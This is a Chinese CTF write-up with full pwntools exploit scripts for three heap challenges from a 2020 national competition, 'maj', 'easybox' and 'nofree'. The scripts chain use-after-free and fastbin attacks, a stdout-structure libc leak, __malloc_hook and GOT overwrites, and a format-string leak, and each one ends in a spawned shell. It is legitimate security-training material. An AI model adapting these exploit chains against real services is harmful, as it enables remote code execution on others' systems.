2020国赛初赛pwn复现(部分)

maj

#!/usr/bin/env python
# -*- coding: utf-8 -*-
# -*- author: n0trix -*-

from pwn import *

# Terminal used by gdb.attach() (the attach call is commented out below).
context.terminal = ['tmux','splitw','-v']
context.log_level = 'info'

io = process('./pwn')
elf = ELF('./pwn',checksec=False)
# Host libc. The hard-coded numbers further down (3954339 and the `one`
# offsets) are not resolved through this ELF, so they appear to be specific
# to the libc build used when the writeup was made.
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6',checksec=False)
# Offsets into libc; only one[3] is used (in pwn()).
one = [0x45226,0x4527a,0xf0364,0xf1207]

def add(size,tag,ch=1):
    """Drive menu option 1: answer the question prompt with '81', then send
    *size* and *tag* as lines.

    ch == 1 waits for the prompt variants that end in '\\n'; any other value
    waits for the bare prompt text.
    """
    io.sendlineafter('>> ', '1')
    if ch == 1:
        ask_question, ask_size, ask_tag = 'question\n\n', '?\n', '?\n'
    else:
        ask_question, ask_size, ask_tag = 'question\n', '?', '?'
    io.sendlineafter(ask_question, '81')
    io.sendlineafter(ask_size, str(size))
    io.sendlineafter(ask_tag, tag)



def dele(idx,ch=1):
    """Drive menu option 2 for entry *idx*; *ch* picks the prompt variant."""
    io.sendlineafter('>> ', '2')
    ask_index = 'index ?\n' if ch == 1 else 'index ?'
    io.sendlineafter(ask_index, str(idx))

def edit(idx,con,ch=1):
    """Drive menu option 4: select *idx*, then send *con* raw (no newline)."""
    io.sendlineafter('>> ', '4')
    if ch == 1:
        ask_index, ask_content = 'index ?\n', 'content ?\n'
    else:
        ask_index, ask_content = 'index ?', 'content ?'
    io.sendlineafter(ask_index, str(idx))
    io.sendafter(ask_content, con)

def pwn():
    """Run one attempt of the exploit chain against the global `io`.

    Any pwntools error (target died, expected prompt never arrived)
    propagates to the loop at the bottom of the file, which respawns the
    process and calls this again.
    """
    add(0x68,'0')
    add(0x80,'1')
    add(0x68,'2')
    add(0,'gap-#3')
    #gdb.attach(io)
    dele(1)
    add(0x68,'4')
    dele(0)
    dele(2)
    edit(2,'\x70')

    # Only two bytes are sent here; presumably this is the step the retry
    # loop at the bottom exists for, since a run can fail from here on.
    edit(4,'\xdd\xa5')
    add(0x68,'5')
    add(0x68,'6') #also is 1 and 4
    add(0x68,'7') #get stdout

    edit(7,'a'*51+p64(0xfbad1800)+p64(0)*3+'\x48')
    #print io.recv()
    # Read up to and including the first 0x7f byte, pad to 8 bytes, then
    # subtract a hard-coded offset (3954339) that is specific to the libc
    # build used in this writeup.
    libc_base = u64(io.recvuntil('\x7f').ljust(8,'\x00'))-3954339

    log.success('libc: '+hex(libc_base))
    malloc_hook = libc_base + libc.sym['__malloc_hook']

    # Second half uses the ch=2 prompt variants (prompts without '\n').
    dele(5,2)
    edit(5,p64(malloc_hook-0x23),2)
    add(0x68,'8',2)
    add(0x68,'9',2)
    edit(9,0x13*'A'+p64(libc_base+one[3]),2)
    # Final request is sent inline rather than through add(): the size
    # prompt is answered with '10' and the tag prompt is left for
    # io.interactive().
    io.sendlineafter('>> ','1')
    io.sendlineafter('question\n','81')
    io.sendlineafter('?','10')


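# Retry until one call to pwn() completes without raising; a failed attempt
# leaves the target dead, so close it and spawn a fresh process.
while True:
    try:
        pwn()
    except Exception:
        # Narrowed from a bare `except:` so that KeyboardInterrupt/SystemExit
        # still stop the loop instead of being swallowed into another retry.
        io.close()
        io = process('./pwn')
        continue
    else:
        break
io.interactive()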
ps:对于这个UAF的利用,从网上找了一份别人的方法
# Excerpt of another author's approach. Add/Del/Edit are not defined on this
# page; they look like the equivalents of add/dele/edit above, but confirm
# before reusing.
p=process('./pwn')
Add(0x60,'a'*0x10)#0
Add(0x60,'a'*0x10)#1
Add(0x90,'a'*0x10)#2
Add(0x60,'a'*0x10)#3

Del(2)
Edit(2,p64(0x71)+'\xdd\x25')

Del(0)
Del(1)
Del(0)

Edit(1,'\xe8') # address of the fake chunk header

在已经进入unsortedbin的chunk中构造一个fake fastchunk
fd改为0x71当作size,改bk为fakechunk的fd
然后链入fastbin进行fastbin attack, smart!

easybox

#!/usr/bin/env python
# -*- coding: utf-8 -*-
# -*- author: n0trix -*-
# tag : successfully getshell
from pwn import *

# Terminal used by gdb.attach(); 'debug' logs every byte sent and received,
# which is noisy but useful when a prompt string does not match.
context.terminal = ['tmux','splitw','-v']
context.log_level = 'debug'

io = process('./pwn')

# Host libc. The hard-coded numbers below (3954339 and the `one` offsets)
# are not resolved through this ELF and appear to be specific to the libc
# build used when the writeup was made.
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
elf = ELF('./pwn')
# Offsets into libc; only one[3] is used below.
one = [0x45226,0x4527a,0xf0364,0xf1207]

def add(idx,size,con,ch=1):
    """Drive menu option 1: send *idx* and *size* as lines, then *con* raw
    (no newline).

    ch == 1 waits for the prompt variants that end in '\\n'; any other value
    waits for the bare prompt text.
    """
    if ch == 1:
        prompts = ('>>>\n', 'idx:\n', 'len:\n', 'content:\n')
    else:
        prompts = ('>>>', 'idx:', 'len:', 'content:')
    menu, ask_idx, ask_len, ask_content = prompts
    io.sendlineafter(menu, '1')
    io.sendlineafter(ask_idx, str(idx))
    io.sendlineafter(ask_len, str(size))
    io.sendafter(ask_content, con)

def dele(idx,ch=1):
    """Drive menu option 2 for slot *idx*; *ch* picks the prompt variant."""
    menu, ask_idx = ('>>>\n', 'idx:\n') if ch == 1 else ('>>>', 'idx:')
    io.sendlineafter(menu, '2')
    io.sendlineafter(ask_idx, str(idx))

def writeSize(byte):
    """Re-create slot 1 with 0x18 filler bytes followed by *byte* (ch=1 prompts)."""
    filler = 'A' * 0x18
    dele(1)
    add(1, 0x18, filler + byte)

def writeSize2(byte):
    """Same as writeSize() but using the ch=2 prompt variants."""
    filler = 'A' * 0x18
    dele(1, 2)
    add(1, 0x18, filler + byte, 2)

# Initial layout; slot 4 is only a spacer (original comment: gap).
add(0,0x28,'aaa')
add(1,0x18,'aaa')
add(2,0x68,'aaa')
add(3,0x58,'bbb')
add(4,0x10,'bbb') #gap

dele(2)
dele(0)
# 0x29 bytes of content for a 0x28-byte request: the trailing 0xf1 is one
# byte beyond the requested length.
add(0,0x28,0x28*'A'+p8(0xf1))

#unsort overlap
dele(1)
add(1,0x18,'bbb')
# Only two bytes are sent; there is no retry loop in this script, so a
# failed run has to be restarted by hand.
add(5,0xc0,'\xdd\xa5')
#write size and alloc it,then fake chunk is head of fastbin
writeSize('\x71')

add(6,0x68,'junk')
#write back to normal
writeSize('\xd1')
add(7,0x68,51*'\x00'+p64(0xfbad1800)+p64(0)*3+'\x48')

# Six received bytes padded to 8; 3954339 is a hard-coded offset for the
# libc build used in this writeup (same constant as in the maj script).
libc_base = u64(io.recv(6).ljust(8,'\x00')) -3954339
log.success('libc:'+hex(libc_base))
malloc_hook = libc_base + libc.sym['__malloc_hook']

# From here on the ch=2 prompt variants (no trailing '\n') are used.
writeSize2('\x71')
#dele 6 (2)
# Inline delete of slot 6: the menu prompt is not waited for here.
io.sendline('2')
io.sendlineafter('idx:','6')

dele(0,2)
add(0,0x28,0x28*'A'+'\xf1',2)
dele(1,2)
add(1,0x18,'aaa',2)
add(5,0xc0,p64(malloc_hook-0x23),2)
writeSize2('\x71')
add(6,0x68,'junk',2)
writeSize2('\xd1')
#attack
add(8,0x68,0x13*'\x00'+p64(one[3]+libc_base),2)
#trigger
# The last request is left at the len prompt; io.interactive() takes over.
io.sendlineafter('>>>','1')
io.sendlineafter('idx:','9')
io.sendlineafter('len:','16')
io.interactive()

nofree

题如其名,方法: house of orange

#!/usr/bin/env python
# -*- coding: utf-8 -*-
# -*- author: n0trix -*-

from pwn import *

# Terminal used by gdb.attach(); 'debug' logs every byte sent and received.
context.terminal = ['tmux','splitw','-v']
context.log_level = 'debug'

io = process('./nofree')
elf = ELF('./nofree')
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')

# Address inside the target binary (0x6020C0 + 0x100) that is written with
# p64() in the second edit(2, ...) call below; specific to this binary.
infoArray = 0x6020C0+256

def add(idx,size,con):
    """Drive menu option 1: send *idx* and *size* as lines, then *con* raw."""
    line_answers = (('>> ', '1'), ('idx: ', str(idx)), ('size: ', str(size)))
    for prompt, answer in line_answers:
        io.sendlineafter(prompt, answer)
    io.sendafter('content: ', con)

def edit(idx,con):
    """Drive menu option 2: select *idx*, then send *con* raw (no newline)."""
    line_answers = (('>> ', '2'), ('idx: ', str(idx)))
    for prompt, answer in line_answers:
        io.sendlineafter(prompt, answer)
    io.sendafter('content: ', con)


# Per the section name the target offers no free; fill slot 2 with 24
# allocations of 0x90 bytes first.
for i in range(24):
    add(2,0x90,'a'*0x90)

add(2,0x90,'0'*0x20)
add(2,0x90,'overflow'.ljust(0x30,'a'))
edit(2,'a'*0x38+p64(0x91))

#trigger free.
add(1,0x90,'a'*0x90) #junk chunk
add(0,0x70,'writegot')
#write fd
edit(2,'A'*0x38+p64(0x71)+p64(infoArray))

#1 is useless
add(1,0x60,'a'*0x60)
add(0,0x90,'A'*0x60)

#edit 0 to modify got
edit(0,p64(elf.got['atoi'])+p64(0x100))
#write atoi's got as printf
edit(1,p64(elf.plt['printf']))
#leak libc
# The idx prompt is answered with a format string; the echoed line is parsed
# as hex, and 240 is the distance from that value to __libc_start_main for
# the libc build used in this writeup.
io.sendlineafter('>> ','1')
io.sendlineafter('idx: ','%25$p')
libc_start_main = int(io.recvline().strip(),16)-240
libc_base = libc_start_main - libc.sym['__libc_start_main']
log.success('libc : '+hex(libc_base))
system = libc_base + libc.sym['system']

#write atoi to system, use printf's return value to select
# sendafter (not sendlineafter) for the idx answer: presumably because the
# menu now reads input through printf, as the original comment says.
io.sendlineafter('>> ','2')
io.sendafter('idx: ','2')
io.sendafter('content: ',p64(system))
io.sendlineafter('>> ','/bin/sh\x00')
io.interactive()